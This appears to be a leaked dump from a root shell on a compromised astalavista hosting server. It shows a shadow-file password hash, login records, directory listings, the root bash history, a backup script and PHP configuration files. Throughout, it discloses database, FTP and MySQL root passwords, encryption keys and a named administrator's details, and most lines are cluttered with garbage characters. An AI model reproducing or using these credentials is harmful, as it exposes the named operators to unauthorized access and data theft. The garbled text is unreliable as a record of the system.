+ v9 n- |, q* q) q6 ]7 sastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
F1 ] Y( G2 y' l# ~% n3 g( n
1 n3 ?4 j" H7 R R3 C! T0 A0 p% esh-3.2# cat /etc/motd& t& c2 u! t+ X! v) c
#####################################################) U& n5 |, I) ]$ G: f2 ^
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
z$ }0 _* c. i# |__| [__ | |__| | |__| | | | [__ | |__| #: m" W# \* g4 n$ D
# | | ___] | | | |___ | | \/ | ___] | | | #
5 @ J0 e) Y) U3 b( r& g% M0 d# #( ]7 I, f7 x4 y% O
#####################################################+ P, W* O/ P& ~4 b3 @1 n; h
# #9 R$ T, |* K) k# \' z7 g
# Admin Contact - 链接标记support@secureservertech.com #
( h1 n+ I- V8 H2 C* }; ^6 m3 r% O/ T# #
4 }$ W! D0 E" x5 x2 Y# Available ShortCuts #
5 [4 q/ h! a& {# #( ~; I$ ?" p: x& d8 R" d
# nst - list active connections #& S/ s1 j$ e$ @
# ddos - shows how many times each ip is connected #6 X. |6 [' A! O1 w$ x8 K
# ltr - restart the webserver #: m0 k" w( D) J, [2 V
# phpc - edit the php config file #
# h7 k9 |$ p* P+ m/ y! K% s7 `# htc - edit the webserver configuration file #9 F( R. A8 @* n9 O9 b/ ^$ K3 C
# up - uptime #
% }) }% @0 v/ T3 e9 a# etd - edit the motd of the day file #2 H9 s4 R5 B; L0 g$ B
# htr - start and restart apache if needed #
| c! I1 O$ ?5 Q8 X, q0 z, w# syng - shows active SYN_RECV connections #+ D. v- E9 r( S8 Z6 R7 O( s
# synd - syn flood blocker - “synd -h” for usage #
$ v/ o% R& E8 ~ s5 Z: |7 `! s9 K#####################################################
7 y6 ]. K5 ]* R8 z! D" N# NOTES: #, m# L, D6 |; B9 z6 V: e% c
# Last Upgrade - 12-08-2008 by JF #& A5 ^, {* u2 o/ \
# My.cnf/Mysql Optimization - 1-28-09 #0 J) c( ~* O; i/ _- I+ d
# #( a9 [+ q- T' h# r
# #
' Z2 q5 _$ v' l8 z# ~$ ~ j# #8 @' ]4 T3 j* j4 ~3 @9 @; a2 M* I
#####################################################
, U W, K( i! r( s+ w8 | H$ n0 ~; @7 a) D
sh-3.2# lastlog | grep -v Never7 f8 y; ]6 D0 Q
Username Port From Latest
8 Z. d9 A e! @& t- yroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
5 A7 g" C$ o9 D+ tadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
. w% S# a/ a8 S, V0 z/ Wcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
4 u# A7 `, J( Z1 C& qastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20092 z! @" c6 E7 f' E+ O6 w+ V
6 D6 c Q" q+ G3 H6 j1 e+ n8 o+ {& O5 I5 osh-3.2# ls -la3 l( R. h2 ]3 n$ k* R- }
total 4533767 T7 Q+ `/ d. Q+ O
drwxr-x— 15 root root 4096 Jun 4 08:40 .' U, t7 O5 U2 T: g) E7 W( b" H4 \
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
, U$ y: r4 |' [4 j% a8 a-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
* V2 C$ I" X" G7 p f- P-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
, k! x8 w# |6 w1 I% H8 o-rw——- 1 root root 16836 Jun 4 07:21 .bash_history* {9 z" g7 Z0 B3 o
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
6 p" \% A& _3 T. u6 b4 {) ?-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile1 O7 ^/ ]( [. z' J9 M8 D" n2 i3 E( `
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
- c6 X+ q9 x( N7 U/ S" C-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
+ m% g% m6 ~) l, |1 H7 L6 v. v-rw-r–r– 1 root root 1327 Nov 29 2007 cert3 p5 O- h& h: _
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql8 l6 a2 J, u& J* v! ?' h" a
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan9 }3 c3 y9 g' k: c% ?
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc) _9 Z7 X6 M) F @5 ?
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql5 ?1 O! ?5 q; J
drwx—— 2 root root 4096 Oct 28 2007 .elinks
% |: M y1 U! \. t) Jdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
* G4 T9 _: r0 t-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz24 {$ b0 V/ {. }1 M( T. j
-rw——- 1 root root 0 Apr 16 13:19 .history
9 V1 ]$ E. U: Y9 S8 h8 e-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
, X+ R3 T7 _& Q$ L5 T-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
1 q t. t) u# ~: a5 z. x-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
, Y4 F) E/ @6 d6 ~" X3 D# A+ W-rw——- 1 root root 35 Jun 2 14:23 .lesshst
% S" { v6 W6 E, _! `5 mdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp% K1 k& i7 T o/ V& A/ T" _* g
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
& \7 x+ a* a- b, Z/ t; u-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz" Z T6 c# n9 M
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
6 G2 T6 K) l% Q$ v-rwx—— 1 root root 760 Sep 18 2008 lp) u8 k1 Q0 k; Z2 \
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1- Z" G! e' x, y o' Q
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
! }) J* M y/ w7 I-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.16 N" `" _9 R C( g
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
& l/ F9 W/ t- Z+ j8 J# i-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz& H+ P i* H: I9 m
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3/ P1 D: g3 X; _( U& ?) [: d
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz7 u7 d1 M9 [0 N2 T/ k
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
. o/ q! U' ^2 L; g-rw——- 1 root root 41 Oct 19 2007 .my.cnf
2 |; S$ g7 ?; W+ t-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
9 w( q6 G: l5 W, W9 o2 m-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport9 c4 ]- p' q0 `3 `4 L S/ J C
-rw——- 1 root root 41 May 20 2008 .mytop% m3 Y0 A7 e! i2 A6 t% \/ |
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6. {1 z9 ^" b& G3 x6 s
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
/ I; q- }8 B* Q2 q* H- c% h$ {drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
8 J+ T, y: l9 u. d-rw——- 1 root root 1462 Sep 21 2007 opt.php$ J6 ]5 Z) B# `! O
-rw-r–r– 1 root root 3371 Sep 22 2007 p
" d' ~/ k/ m) {/ K% ~-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2, d7 y5 J: \ G# s( D
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
: a" P) Q! ~' @, e-rw-r–r– 1 root root 716 Nov 28 2007 server.csr8 k, K) [" r( Z9 o
-rw-r–r– 1 root root 887 Nov 28 2007 server.key) @7 r; x6 P7 v2 Z& r9 t! r# F
drwx—— 2 root root 4096 Oct 10 2008 .ssh7 t/ ?7 G% v* ?0 l N
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat/ B+ q! I0 A ]3 ^% b( ] A$ A$ z( o# J! n- ?
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc7 y o, q( G& \! Y
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
+ H( I! {2 o5 s-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1. ]: l5 ? `4 s% r, d
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
, p# ^. y4 o" l4 b8 f9 m: I-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh0 a3 n, m) C2 U; N3 d& q
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
' r4 v! F, S3 r) x3 j4 o \-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
' r8 R+ m) v, X: ?5 ~ W& `-rw——- 1 root root 12997 May 16 2008 .viminfo1 g. w: V9 s7 n
5 y! A! o$ M, nsh-3.2# cat .bash_history @ ^: ? o' u. y
[snip]9 B1 g+ K! D: @. c) x* V
wget cp4sst.com/sstlinux.tar.gz3 l/ K4 I/ G7 s$ h9 M8 q8 y% n% r" P7 c
tar zxvf sstlinux.tar.gz
% Z' L- C! Y+ h% ?cd linux-2.6.27.10: _' o( z7 V, L/ @1 P5 J
sh install.sh
% n- a" z4 s; D% Emake bzImage ; make modules ; make modules_install ; make install
3 v! f1 h# `2 ^6 f8 smake clean) u8 a: N2 R7 g, L* J
service mysqld restart
- B( ~' F/ M$ |1 o[snip]
6 T! J2 f, q" gcd /usr/sbin/
; T2 y( ~( _: ?' K/ t! T, }7 Z Uchmod 4777 traceroute
9 L/ S1 c0 |5 x4 e$ Q; {chmod 4777 ping& I/ S! d7 i9 J( t& c0 ^5 T3 q, J0 l
traceroute -I 链接标记[url]www.astalavista.ch[/url]
& L8 H1 E& Y5 t V8 F8 ^$ }/ v; q[snip]
$ o8 v% ]# a+ X w# N$ ~8 }( `vi /etc/csf/csf.conf5 a, n2 f# V7 P0 r1 `
traceroute google.ch# e0 k. O% \0 ?* P/ w2 D, M- b9 R
service csf restart. `/ T2 L! C; e2 ~- K% H
tracert google.ch
0 ^8 a6 W+ c. n9 m0 j# o5 S9 e/ f1 mservice csf restart
4 I8 O. Z `6 K ]5 c1 l( Z0 etraceroute 链接标记[url]www.google.ch[/url]
8 L6 Q. T7 {( V' P3 o _tracert 链接标记[url]www.google.ch[/url]
6 @& I' A9 k6 x, e2 Ftraceroute 链接标记[url]www.google.ch[/url]
) M6 f' R) S6 [* z I" O6 vlocate traceroute
. m( B8 q/ K5 j% _. Q; |( {chown 4755 /bin/traceroute$ b* z& Q. i8 }: G$ o
chown 4777 /bin/traceroute, ?) D" h8 v: E* `3 M, Y
locate ping* f- @7 c/ X2 A
chown 4755 /bin/ping# ~/ Z1 o7 g6 D" B; C5 T
chown 4777 /bin/ping0 G: ~9 m4 a( b8 y6 W0 y
cd /bin/
! w k. `7 k! y" e4 j$ c0 c9 d. n' qls -ali | grep ping! J/ s" c1 Z3 {
chown root ping5 Z# `/ D) e3 x8 H* @3 O: J* F
chmod 4755 ping- m0 t8 z4 h! w I. M
ls -ali | grep traceroute
1 L0 J' D7 M1 {, L/ q! G+ \, Y7 G$ Fchown root traceroute9 H# t' y" O' U3 q9 [# @
chmod 4755 traceroute
1 f Z' I w* Q1 V. F% G6 Als -ali | grep traceroute
\( N4 y$ b; w0 H# |- B- xtraceroute -I 链接标记[url]www.google.ch[/url]* _: W; k, S0 z! `2 c
traceroute 链接标记[url]www.google.ch[/url]
4 _' g9 a8 z. w2 s( q" i3 r$ cwhois pmsantos.ch) N" X4 r( i5 ?! Q, u
[snip]
5 A4 w+ y5 F9 lmysql -h com_contrexx2_live < /root/defaultp_ports.sql
2 |6 C H2 F# E/ Cmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql( Q9 D9 Y S7 n9 X* L
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
+ v. a3 C& k4 O) Lmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql( |0 [! _) K @! G! E7 V" O x
top6 Z' S4 H: p3 S8 `/ T
ping ssth.ch
. Z, C4 S a2 ^5 _ n X0 K. _$ t# _ping asdlkfaljgasd???ljg???lasj.ch5 i4 q8 V x/ {) ~& T# L4 n! x
ping asdlkfaljgasdlasj.ch# ]% I. N) t3 N' O
ping 链接标记[url]www.ssth.ch[/url]
' g- m) Y8 i3 G5 D( lping ssth.ch
1 T3 D1 r) Q! `* U/ cnslookup 链接标记[url]www.google.ch[/url] Z2 S$ r6 Q' q: V9 s* X
nslookup 链接标记[url]www.ssth.ch[/url]
# _, H4 l5 J) j1 @4 gman nslookup* x9 Z6 a" y! P# K) e( c' g
ping 链接标记[url]www.google.ch[/url]+ C; a+ L4 ]' j- {
nslookup 链接标记[url]www.google.ch[/url], |, N7 t" K, \: ^/ u
nslookup 链接标记[url]www.google.ch[/url]# R& w- o/ m. i1 t' N+ s
nslookup salfjasdlf.ch
, h& V, Q2 v# g D# `" t[snip]
% t G e* L$ P, S# h1 u1 Lopenssl passwd -1 sadf% G1 o9 I" v4 D: x
openssl passwd -1 5cZNHstdTy
. @3 A* Q& ~0 L$ R* y6 J0 `/ Kmysql. \5 o& H7 v# F, A: ?
mysql
7 F" j+ Z( {" @) llocate proftp
9 @8 x: ^. ?9 cvi /etc/proftpd.passwd3 w4 r7 b2 S: m+ K: ^% @/ \
service proftpd restart5 t1 f) O' n/ h
locate proftpd.conf
# }% z, Y5 v- r4 u$ ]vi /etc/proftpd.conf
" Q. \2 ~0 G3 K$ A, ]* g! J' Yvi /etc/proftpd.passwd+ A& P+ r9 _/ s: v1 H" ?
service proftpd restart
- ^ g1 q# H" s3 a# J" M[snip]) \5 @6 b0 U1 P1 x) U, B3 Q7 |
/bin/sh /home/com/backup_system/backup.sh0 {/ X4 J/ {: e) s' O& j9 E: C
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
6 O& o# U/ ^, Y1 j( f2 U5 R- [/ O! Wmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql4 [. R7 O; ]9 C, L0 I9 E( X6 [2 L2 l8 B7 C
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
* _3 m# T. u: q* U R/ hls -ali: d1 j* q0 j, C' x) h
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql" l! |3 |/ M# a; ]. E7 B, u- S
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql U: G2 q3 ~% `* ^1 O
crontab -l5 j9 C7 H: w% a) r' I% G
crontab -l6 s% d X2 ]" ?0 T+ o: Y/ @ Z
php -q /home/com/public_html/modifications/cronjobs/securitynews.php5 e$ {/ ]3 k4 x9 A# F4 f* F
/home/com/public_html/modifications/cronjobs/exploits.sh
: i0 z& v8 h4 \% Q }$ gwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
0 z2 Z1 \! K" ^ }6 Rtar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
2 B) a8 B& z: }& O- y: z) Kcd lsws-4.0.3/ q# l5 p) f3 Z
sh install.sh- |8 [& @( r3 U( D0 G
uptime0 f; p7 }% B) v5 U
hdparm -tt /dev/sda
$ z+ l* {- D* {iostat3 [8 J- T$ M1 ?' ^7 q
yum install iostat
7 x% S E8 V: L* Oiostat6 `2 N! m9 M2 E j5 E$ n5 J# K/ R
whereis iostat
3 A8 |/ D# e! M" c4 N2 ^yjm clean all+ v5 A( t; x& N1 I, Y
yum clean all ; yum -y update
+ P2 O9 ~ m, P/ S( L8 F' K/ b& ]iostat
7 O7 ^" u* w# p0 q. `6 Gyum install systat
5 W* i' U/ D% [: K) }. yrpm -qa | grep iostat
" _/ q: A# \2 Z% ~* l+ Irpm -qa | grep sysstat
% S2 j; C% `: J$ {rpm -qa | grep systat
# M' j9 T2 d6 ddmesg -c' J: u) ?6 o7 M2 L! k7 e2 I
sysctl -p2 W& I3 V) f* g" {( B
uname -r
% D2 |4 f1 n+ M: z+ Kcd /usr/src
/ Z1 r$ R! ^ y2 p, Ywget nix101.com/kernels/sstlinux.tar.gz
D6 A9 ^) ^7 @shutdown -r now
/ U R8 t& Z& ]8 w* |" N3 Onano -w /boot/grub/grub.conf- A, s; c2 k% }
3 b# H3 [) F% A, B x' L2 ssh-3.2# cat .my.cnf
h, ~$ N8 G7 ?& b! `/ D[client]: g, M$ m4 _/ w9 Z. w9 V1 J& d
user=da_admin- k- L0 }2 ^; X7 D. l" i7 |
password=X9dctmRH
5 E* @! X4 X, E( R- r6 m7 B0 i4 a' w( `/ n1 L. l
sh-3.2# cat /home/com/backup_system/backup.sh
5 `4 j0 u9 D7 g5 o4 @#!/bin/sh8 R, R0 r$ w. e/ \& i% k! o
#####################################################################
6 P, f A0 ?* ~; a5 B. z) Q |# #* b# ~* Q `- [" P, I" S
# incremental backup for astalavista.com #
/ e6 ` y& U% |: Q; h7 b3 e# e# #
' g) [* `: x) e, ^+ X2 w# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
$ @8 i n; F$ D" Y. Q4 }6 O7 `# #5 S* N' e2 I0 W" ~" H
#####################################################################! ?+ }0 B8 m6 a; L+ O8 ]8 K
[snip]5 C4 y, l+ i! w7 N1 L( n
PROG_DIR=”/home/com/backup_system”;$ t: b4 Y, c( y
BACKUP_DIR=”/home/com/backups”; S, l3 v" _* A, R; G
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;: d8 D9 f: t9 ]
# ftp for synology backup server, y$ X6 \' h! n& F; G/ [& G: K! U
FTP_HOST=”212.254.194.163″;
; t, |6 \# X& O9 Y% fFTP_PORT=”21″;
3 J7 P8 S2 t* [6 kFTP_USER=”astalavista.com”; l3 M. ?" y7 g9 f. f/ K" A
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
; L. G- z! ^4 e$ V' ^& O) fFTP_DIR=”/astalavista.com”;
' `! h9 ]% \ q" n9 Y# database; @" y8 T: V) N2 B% i
DB_HOST=”localhost”;
- L% F; T. l1 k1 r: t# dDB_USER=”contrexxuser2″;8 J% i8 P; w5 `
DB_PASS=”0fEYNZgXz1pKe”;
, e/ {! [% U' {3 S$ r7 S+ `DB_DATABASE1=”com_contrexx2_live”;
- O, ^+ s$ T1 i& w1 X, Y% Y8 QDB_DATABASE2=”com_contrexx2″;8 f9 {! W" O4 o7 [
[snip]
5 r* r. Q0 u! b4 Z+ D/ h3 z e! Yftp -in $FTP_HOST $FTP_PORT <<EOF
8 }+ F; i: E ^$ |4 d5 ~quote USER $FTP_USER: J* L$ F& B0 v, R
quote PASS $FTP_PASS
; W7 n, b+ t1 o- U# {, Bcd $FTP_DIR" O1 R; |7 {. }: {. ~
put $DB_FULLNAME-SQL_Dump.tar
' L) Q- v/ z. H/ ~- \* Wput $BACKUP_FULLNAME-Public_HTML.tar% r; Z3 K% ~* }2 ?1 \2 g0 Q
close" U; u* V, w# C+ W' R+ `+ f
bye
+ d+ s. f( i+ Q6 t2 o t' {0 rEOF; D$ N3 h5 K( [1 S" ^
: u0 H6 I( O$ M8 H( H5 a( k) A0 Ush-3.2# cd /home
9 K( V. k2 J9 Csh-3.2# ls -la" `8 U; K3 z- [' a9 _
total 120" r8 l# _' N. T: i3 n6 X( G
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
2 d5 c( A" O9 zdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
8 y9 y9 D: Z9 h1 M, jdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
4 D% T5 X/ o" _9 `2 H' A-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
. C" q$ n, Q9 k5 Q6 A; N% l. c! E-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
5 e. b# D2 B2 t9 |; ^drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
& v6 E5 J* _0 K; ^' c% @" jdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup7 C" P$ ]( a& U# f4 t$ @0 q
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
3 c- x/ O, {, ^# r7 F; n3 g4 J) ldrwx–x–x 10 com com 4096 Apr 28 12:40 com
% p( w3 v, @: h0 M3 Q2 t" P1 Pdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
' ?4 |- o# p) c, kdrwx—— 3 jon jon 4096 Sep 21 2007 jon, J8 g: t1 T8 d s* ^
drwx—— 2 root root 16384 Sep 11 2007 lost+found
9 l+ \. e% L7 Q3 R2 p5 a+ gdrwxr-xr-x 2 root root 4096 Sep 14 2007 my$ S$ f+ W1 b i: Z0 n8 T" t
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
) h$ u! w0 p5 {- bdrwx—— 2 jon jon 4096 Sep 15 2007 test* @4 `6 c1 e4 c% O/ H
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp5 B- X) E0 u* p$ C2 ?
" r8 I7 h L8 k, @. Gsh-3.2# cd admin
' O! S: \% {3 ~2 S( S6 v3 ^. wsh-3.2# ls -la
5 o7 M/ R% z( r! i/ ~total 1735896
2 T" s ?2 q/ v6 f2 i8 P' j( sdrwx–x–x 9 admin admin 4096 Nov 28 2007 .
# N- h9 A, W1 T- v3 u0 S9 u! Zdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..8 r& P* \8 N8 [
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups. K3 ]) d( ]6 P
drwx—— 2 admin admin 4096 Sep 28 2007 backups
2 t( E" g- I0 O. j; F-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
; p- `0 s7 s. H+ ^- @-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout7 Q( \& t/ k4 N" ^
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
* l X* b- w( k! F: C! R-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc( X3 z( \& o3 r7 g) x; _4 T5 f) h2 L6 R
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
2 K1 ~ P$ y/ ^: x" Bdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
P, ]0 a* y/ h+ k1 mdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap" R9 y- K( d: v4 A4 Q* F
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
) c1 L; \ P: f5 p6 Tdrwx—— 2 admin admin 4096 Sep 21 2007 mail
: k1 X% C# q! ?+ P- A& x" V-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
8 m/ l' K7 }* ~+ R* Q/ f-rw-r–r– 1 root root 887 Nov 28 2007 server.key$ g7 s" V: g( N( `1 n
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
- V3 E. m2 u O-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
7 X5 o; j5 c2 l7 R! U4 {8 Ndrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups3 N: E* n4 L! i& X$ d
4 v* ?6 d+ Y7 _: C, Y6 C) f0 Hsh-3.2# ..4 {% O# U* o2 X- v
sh-3.2# cd jon
8 B) ^' V4 _( v& W2 y$ rsh-3.2# ls -la5 n3 T9 N! t9 q% r% |
total 368 ?4 W4 j, @9 H3 Y5 Q
drwx—— 3 jon jon 4096 Sep 21 2007 .
2 b( n Y0 Y; m+ {drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..; C- m1 A5 _& q* x
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
: S1 _2 K8 V, ~-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
' `1 ^% m6 A2 y! @* H-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile' |1 i, j$ N/ c7 v- a! g% T5 }
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
6 A% W" f1 R9 b6 n8 ?/ H-rw-r–r– 1 root root 24 Sep 21 2007 info.php
" v+ Z4 l( G, a/ J- ~0 B* C$ |drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html" n& p+ y" J2 m: p
3 b) R- s2 Z; U# ~8 gsh-3.2# cd ..
# l% z% Z! |2 v S( w- W; vsh-3.2# cd test
5 @5 y+ ~& G) E) g) s, ssh-3.2# ls -la
2 f+ `. L- f8 p# e0 N' W" Z0 _: \total 48& N. j- K ]4 {! l: T
drwx—— 2 jon jon 4096 Sep 15 2007 .
. s. Q% {5 C# R7 P V; J" P' Ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
# `4 e6 W8 t# A0 w& s1 b-rw——- 1 jon jon 79 Sep 21 2007 .bash_history' f: f0 W! ~7 b; M7 ]
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout% n+ q0 F. n' ]$ Z/ ?
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile4 m! O, c$ x6 f; D5 z7 d
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
~. y! a; P) ^' tsh-3.2# cat .bash_history; u$ ^2 B4 h# D* E0 h$ {
/usr/bin/mysqladmin -u root password PoliuJhytg67# s* W- c U! B2 g% f# o
1 d6 t* b- p& U G L/ Dsh-3.2# cd ..
. {, Q7 z2 L5 b: t9 ash-3.2# cd astanet: x: v: y' ] E# U3 f+ i8 d: n
sh-3.2# ls -la6 `; | M) c' |7 K8 b8 E
total 52
+ e9 A0 R5 g9 O- `drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
p+ A. q M! z- m/ [* }# ?drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
0 E2 W' ~9 X1 c. kdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
: j, Y, c7 |( J0 X w3 H! e-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history0 v, G& d! _" g3 {8 h+ _
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
1 f' S6 G; t$ x$ r0 E" C$ q v# s% j-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
. D* B1 v! i' Y. j% v-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc1 m9 W8 |1 O3 x% B3 ~4 Y
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains1 L2 S7 {+ t4 h
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap: O m! f1 C) d. A
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail2 Q D: n/ `& |
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
; Y V. q% p! a/ j* g0 {- c4 tlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html0 B# A8 V! I" v$ r' _
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow; `5 y' v T- T
3 K6 x( j- J$ D) W6 Rsh-3.2# cd auth/
0 L1 C+ G3 @+ b- s6 |% gsh-3.2# ls -la# h# }+ \9 n/ a* N; x# A
total 28
' d8 [5 v0 }: A) Q; sdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
' f5 [+ n2 g7 ]3 [( {6 M4 {8 `0 Idrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
( P- G: s$ L: n" i5 k0 D) H& h/ _' b. O" L-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php9 K$ Q M0 v, K& Q2 ~. E0 [, i7 j
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php6 T% ? T8 Q, O# Y- h& j3 e
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd; Y2 e- j5 N& B) m: |
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
: E# @3 P) |% h) q- @7 m* E-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
! M" H* G) z4 j5 e9 D4 t& [+ V2 k3 G! M2 h/ d, @
sh-3.2# cat hackercontest.config.inc.php
' `0 N; h+ s) l4 t) x<?PHP0 U4 y* q0 B3 L1 M0 M. y
// Variabeln f?r Verbindung zur Datenbank //- k' E: n4 g6 K/ O$ o7 [: Z) k- b
$conxHost = ‘localhost’; // MySQL hostname
) `% t# t3 f3 \) b" u$conxUser = ‘hackercontest’; // MySQL user
# n) I8 ^& A) Y( V) t3 ~% w$conxPassword = ‘K6m@7dUc’; // MySQL password) l x, S: x- r
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
( H, X. E A s+ Y! H s?>4 U% h/ x, z: P" j y
sh-3.2# cat hosting.config.inc.php' i1 H9 K3 W1 h% V' K2 Q* |
<?PHP
& o1 x* D+ X3 w3 ]8 C// Variabeln f?r Verbindung zur Datenbank //5 s8 f7 R7 ]( H K; [: V
$conxHost = ‘localhost’; // MySQL hostname" b. c- z3 s0 |
$conxUser = ‘hostinguser’; // MySQL user
( y5 ^9 B- `; F5 e2 p0 B! t$conxPassword = ‘cXvB3981′; // MySQL password
9 B' J$ Z( q% }3 e6 B: e9 _) H$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
